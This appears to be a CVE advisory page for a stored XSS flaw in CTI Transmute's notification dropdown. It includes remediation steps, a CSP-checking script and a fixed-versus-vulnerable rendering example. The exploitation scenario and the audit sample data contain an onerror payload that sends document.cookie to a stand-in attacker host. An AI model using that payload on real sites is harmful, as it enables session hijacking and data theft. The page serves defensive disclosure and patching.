CVE-2026-9806: CTI Transmute: stored XSS in notification panel

AWAITING NVD
Published May 28, 2026
CISO Take

CTI Transmute (MISP's CTI format-conversion tool) contained a stored XSS flaw in its notification bell dropdown, where user-controlled convert names were injected into innerHTML without sanitization, enabling arbitrary JavaScript execution in any authenticated user's browser session. The practical risk is limited: the vulnerability existed only on a development branch and has been patched via commit cf42409 — production deployments using a released version were never exposed. With no CVSS score assigned, no public exploits, and no CISA KEV listing, exploitation likelihood in the wild is very low; however, teams sharing development instances among analysts should treat this as a session-hijacking risk against high-value threat intelligence users. Verify you are running the patched release and enforce a hard policy against deploying unvetted development branches to shared environments.

Sources: NVD, GitHub Advisory, ATLAS

What is the risk?

Low overall risk. The development-branch-only scope significantly constrains blast radius — production users of released CTI Transmute builds were not affected at any point. Stored XSS in an authenticated CTI platform still poses meaningful risk in dev/staging environments shared across threat analyst teams, where a single exploit could compromise sessions with access to sensitive intelligence data. No CVSS vector, no public exploit code, and no active exploitation evidence keep this in the informational-to-low tier.

Attack Kill Chain

Malicious Convert Creation
Attacker with convert-creation access crafts a convert name embedding an XSS payload (an inline event-handler attribute such as onerror, or a javascript: URL; a bare script tag inserted through innerHTML does not execute, so that is not the payload to expect), which is stored in the CTI Transmute backend.
AML.T0049
Notification Queued
The platform generates a notification referencing the malicious convert name, storing unsanitized HTML content in the notification bell queue for all relevant users.
Victim Triggers Execution
An authenticated analyst or CISO opens the notification panel, causing the browser to render the payload via innerHTML and execute the injected JavaScript in their session context.
AML.T0011
Session Exfiltration
Injected script silently transmits the victim's session cookie (readable only if the cookie is not marked HttpOnly) or, whether the cookie is readable or not, issues unauthorized platform requests from the victim's browser, granting the attacker access to the CTI platform under the analyst's identity.
AML.T0025

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

What should I do?

5 steps
  1. Upgrade to the patched release containing commit cf42409badc27b13d9bb644b9175aa7f27e11259; this is the definitive fix. Confirm the deployed checkout actually contains that commit rather than trusting a version string, since the flaw lived on a development branch.

  2. Enforce branch deployment policies: only tagged releases go to shared or production environments; dev branches stay local.

  3. Audit existing convert names, and any notification messages already queued, for HTML tags, event-handler attributes (onerror=, onload=) and javascript: URLs as a retrospective indicator of attempted exploitation. Do not search only for script tags: a script element created via innerHTML does not run, so a real attacker would have used a handler attribute.

  4. Validate that your CTI Transmute deployment sends a Content-Security-Policy header that omits 'unsafe-inline' from script-src (for example default-src 'self'; script-src 'self'; object-src 'none'). With no inline allowance the onerror handler is blocked, and connect-src inheriting 'self' from default-src also stops a fetch() to an attacker host. CSP limits blast radius; it does not replace the patch.

  5. If unable to patch immediately, restrict who can create or rename converts to trusted users, since the convert name is the injection point. Limiting notification-panel access to trusted networks reduces exposure but does nothing against an insider or a compromised account.
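A checker for step 4, as an added example that is not part of the original page or of CTI Transmute: it parses a Content-Security-Policy header and reports whether the policy would actually stop the inline onerror handler and the fetch() exfiltration described in this advisory. The header strings in the block are constructed, the cdn.example.com origin is a placeholder, and the curl line in the comment assumes you substitute your own host.

```javascript
// Added example, not CTI Transmute's code: parse a Content-Security-Policy
// header and report whether it would block the inline event handler and the
// fetch() exfiltration pattern described on this page. Headers below are
// constructed; fetch yours with
//   curl -sI https://<your-transmute-host>/ | grep -i content-security-policy
// (host name is a placeholder).

// Parse "name src src; name src" into { name: [src, ...] }. When a directive
// is repeated, browsers honour the first occurrence and ignore the rest.
function parseCsp(header) {
  const directives = Object.create(null);
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!(name in directives)) directives[name] = tokens.slice(1).map((t) => t.toLowerCase());
  }
  return directives;
}

// script-src, connect-src and img-src fall back to default-src when absent;
// null means the browser applies no restriction at all for that fetch type.
function effectiveSources(directives, name) {
  if (directives[name]) return directives[name];
  if (directives['default-src']) return directives['default-src'];
  return null;
}

function allowsAnyHost(sources) {
  return sources.some((s) => s === '*' || s === 'https:' || s === 'http:');
}

// Returns a list of findings; an empty list means the header blocks both the
// inline handler and the cross-origin exfiltration used by the page's payload.
function checkCsp(header) {
  const findings = [];
  if (!header || !header.trim()) {
    return ['no Content-Security-Policy: inline handlers and cross-origin fetch() are unrestricted'];
  }
  const d = parseCsp(header);
  const script = effectiveSources(d, 'script-src');
  if (script === null) {
    findings.push('no script-src or default-src: inline event handlers run');
  } else {
    // CSP3 browsers ignore 'unsafe-inline' once a nonce or hash is present,
    // so only flag it when it is actually in effect.
    const hasNonceOrHash = script.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
    if (script.includes("'unsafe-inline'") && !hasNonceOrHash) {
      findings.push("script-src allows 'unsafe-inline': an onerror= handler executes");
    }
    if (allowsAnyHost(script) || script.includes('data:')) {
      findings.push('script-src allows scripts from any host or data: URLs');
    }
  }
  // A blocked fetch() is little help if <img src> or other fetches can still
  // carry the stolen data out, so check the exfiltration channels too.
  for (const name of ['connect-src', 'img-src']) {
    const src = effectiveSources(d, name);
    if (src === null || allowsAnyHost(src)) {
      findings.push(`${name} unrestricted: stolen data can be sent to an attacker host`);
    }
  }
  return findings;
}

// Constructed headers for the demo (cdn.example.com is a placeholder).
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.com; img-src *";
const STRONG_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'";

for (const [label, header] of [['weak', WEAK_CSP], ['strong', STRONG_CSP], ['missing', '']]) {
  const findings = checkCsp(header);
  console.log(`${label}: ${findings.length === 0 ? 'OK' : findings.join(' | ')}`);
}
```

The check deliberately treats a missing header, a missing script-src with no default-src, and an 'unsafe-inline' allowance as equivalent failures: all three let an onerror= attribute run. It does not try to reason about nonces on the rendered page, only about whether the header is consistent with step 4.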

Classification

Compliance Impact

This CVE is relevant to:

ISO 42001
A.9.3 - AI System Security
NIST AI RMF
GOVERN-1.7 - Processes for Identifying and Managing AI Risks
OWASP LLM Top 10
LLM06 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2026-9806?

CTI Transmute (MISP's CTI format-conversion tool) contained a stored XSS flaw in its notification bell dropdown, where user-controlled convert names were injected into innerHTML without sanitization, enabling arbitrary JavaScript execution in any authenticated user's browser session. The practical risk is limited: the vulnerability existed only on a development branch and has been patched via commit cf42409 — production deployments using a released version were never exposed. With no CVSS score assigned, no public exploits, and no CISA KEV listing, exploitation likelihood in the wild is very low; however, teams sharing development instances among analysts should treat this as a session-hijacking risk against high-value threat intelligence users. Verify you are running the patched release and enforce a hard policy against deploying unvetted development branches to shared environments.

Is CVE-2026-9806 actively exploited?

No confirmed active exploitation of CVE-2026-9806 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-9806?

1. Upgrade to the patched release containing commit cf42409badc27b13d9bb644b9175aa7f27e11259; this is the definitive fix. Confirm the deployed checkout actually contains that commit rather than trusting a version string. 2. Enforce branch deployment policies: only tagged releases go to shared or production environments; dev branches stay local. 3. Audit existing convert names, and any queued notification messages, for HTML tags, event-handler attributes (onerror=, onload=) and javascript: URLs as a retrospective indicator of attempted exploitation; a script element created via innerHTML does not run, so do not search only for script tags. 4. Validate that your CTI Transmute deployment sends a Content-Security-Policy header that omits 'unsafe-inline' from script-src (for example default-src 'self'; script-src 'self'; object-src 'none') to limit XSS blast radius; CSP does not replace the patch. 5. If unable to patch immediately, restrict who can create or rename converts to trusted users, since the convert name is the injection point; limiting notification-panel access to trusted networks does nothing against an insider or a compromised account.

What systems are affected by CVE-2026-9806?

This vulnerability affects the following AI/ML architecture patterns: Threat intelligence platforms, CTI format conversion pipelines, AI-augmented SOC analyst workflows, Analyst-facing security tooling.

What is the CVSS score for CVE-2026-9806?

No CVSS score has been assigned yet.

AI Security Impact

Affected AI Architectures

Threat intelligence platforms
CTI format conversion pipelines
AI-augmented SOC analyst workflows
Analyst-facing security tooling

MITRE ATLAS Techniques

AML.T0011 User Execution
AML.T0025 Exfiltration via Cyber Means
AML.T0036 Data from Information Repositories
AML.T0049 Exploit Public-Facing Application

Compliance Controls Affected

ISO 42001: A.9.3
NIST AI RMF: GOVERN-1.7
OWASP LLM Top 10: LLM06

Technical Details

Original Advisory

A stored cross-site scripting (XSS) vulnerability exists in the notification panel of CTI Transmute in versions prior to the patched release. Notification messages containing user-controlled convert names were rendered in the notification bell dropdown using innerHTML without adequate sanitization. An attacker able to create or influence a convert name that is included in a notification could inject arbitrary JavaScript, which would execute in the browser of an authenticated user when they opened the notification panel. Successful exploitation could allow the attacker to perform actions in the victim's session or access information available to the application in the browser context. The issue was remediated by constructing notification elements through DOM methods and assigning notification message content via textContent instead of innerHTML. This vulnerability was only present on a development branch.
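The innerHTML pattern the advisory describes and the DOM-method/textContent fix, side by side, together with the convert-name audit from step 3 of "What should I do?", as an added JavaScript example. This is not CTI Transmute's own code: the function names, the li/span structure of a notification entry, the sample convert names and the attacker.example host are all assumptions. The audit and the sample data run under Node; the renderer comparison only runs in a browser, where a real document exists.

```javascript
// Added example, not CTI Transmute's code. The innerHTML pattern the advisory
// describes sits next to the DOM-method/textContent fix, and auditConvertNames()
// implements step 3: it flags stored names containing markup that an HTML parser
// would turn into elements or handlers. Function names, the li/span structure and
// SAMPLE_CONVERT_NAMES are assumptions.

// Tags worth escalating even without a handler attribute. innerHTML does not run
// a <script> element it creates, but the others can load remote content.
const DANGEROUS_TAGS = new Set(['script', 'iframe', 'object', 'embed', 'svg', 'link', 'base']);

// Tokenize roughly the way the HTML parser does when a string hits innerHTML: a
// tag is '<', optional '/', then a letter; "< 5" and "<5" stay text.
function extractMarkup(s) {
  const tags = new Set();
  const handlers = [];
  const tagRe = /<\/?([a-zA-Z][^\s\/>]*)([^>]*)>/g;
  const attrRe = /(?:^|\s)(on[a-z]+|href|src|xlink:href|action|formaction)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = tagRe.exec(s)) !== null) {
    const tag = m[1].toLowerCase();
    tags.add(tag);
    attrRe.lastIndex = 0;
    let a;
    while ((a = attrRe.exec(m[2])) !== null) {
      const attr = a[1].toLowerCase();
      // browsers drop whitespace and control characters inside a URL before
      // matching the scheme, so "java\nscript:" still counts
      const value = (a[2] ?? a[3] ?? a[4] ?? '').replace(/[\s\u0000-\u001f]/g, '').toLowerCase();
      if (attr.startsWith('on') || value.startsWith('javascript:')) handlers.push(`${tag}.${attr}`);
    }
  }
  return { tags: [...tags], handlers };
}

// Step 3: retrospective audit of stored convert names.
function auditConvertNames(names) {
  const findings = [];
  for (const name of names) {
    const { tags, handlers } = extractMarkup(name);
    let severity = 'clean';
    if (handlers.length > 0 || tags.some((t) => DANGEROUS_TAGS.has(t))) severity = 'high';
    else if (tags.length > 0) severity = 'review';
    if (severity !== 'clean') findings.push({ name, tags, handlers, severity });
  }
  return findings;
}

// Vulnerable pattern from the advisory: the message is concatenated into
// innerHTML, so markup inside a convert name becomes live elements.
function renderNotificationVulnerable(doc, listEl, message) {
  const li = doc.createElement('li');
  li.innerHTML = '<span class="notif-text">' + message + '</span>';
  listEl.appendChild(li);
  return li;
}

// Fixed pattern: build the nodes with DOM methods and assign the message through
// textContent, which never parses markup.
function renderNotificationFixed(doc, listEl, message) {
  const li = doc.createElement('li');
  const span = doc.createElement('span');
  span.className = 'notif-text';
  span.textContent = message;
  li.appendChild(span);
  listEl.appendChild(li);
  return li;
}

// Constructed sample names, not real data. The third is the payload shape from
// the exploitation scenario; attacker.example is a placeholder host.
const SAMPLE_CONVERT_NAMES = [
  'stix21-to-misp',
  'openioc_to_stix (Q2 review)',
  `<img src=x onerror="fetch('https://attacker.example/?s='+btoa(document.cookie))">`,
  '<a href="javascript:alert(1)">click</a>',
  'Joe <joe@example.org> weekly export',   // unknown element, swallowed by innerHTML
  'threshold < 5 and > 3',                 // plain text, must not be flagged
];

console.log(JSON.stringify(auditConvertNames(SAMPLE_CONVERT_NAMES), null, 2));

// Only meaningful in a browser; a harmless <b> stands in for the payload so the
// vulnerable renderer can be run without firing an onerror handler.
if (typeof document !== 'undefined') {
  const ul = document.createElement('ul');
  const msg = 'New convert created: <b>stix21-to-misp</b>';
  renderNotificationVulnerable(document, ul, msg);
  renderNotificationFixed(document, ul, msg);
  console.log('vulnerable: markup became an element:', ul.children[0].querySelector('b') !== null); // true
  console.log('fixed: markup stayed text:', ul.children[1].querySelector('b') === null);            // true
}
```

The audit follows the parser rather than a naive "contains <" rule: a comparison like "threshold < 5" is never a tag, while "Joe <joe@example.org>" is an unknown element that innerHTML would silently swallow, which is why it lands in the review tier instead of being ignored or escalated. Run it over the convert table and the notification queue, not just one of them, since the stored name and the queued message can diverge after a rename.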

Exploitation Scenario

An attacker with convert-creation permissions in CTI Transmute (a malicious insider, a compromised service account, or an external actor who gained write access via a separate vulnerability) crafts a convert name containing a JavaScript payload such as `<img src=x onerror="fetch('https://attacker.com/?s='+btoa(document.cookie))">`. The platform stores this name and queues a notification. When a CISO or senior analyst opens the notification bell dropdown, a routine action during threat review, the browser parses the name as markup, the image load for `x` fails, and the onerror handler runs, exfiltrating their session cookie to the attacker's server. If the session cookie is marked HttpOnly, document.cookie does not expose it, but the script still executes inside the victim's authenticated session and can issue platform requests directly. The attacker replays the stolen cookie, or drives those in-session requests, to act on the CTI platform as the victim, potentially poisoning threat intelligence feeds consumed by downstream AI enrichment pipelines.

Weaknesses (CWE)

Timeline

Published
May 28, 2026
Last Modified
May 28, 2026
First Seen
May 28, 2026

Related Vulnerabilities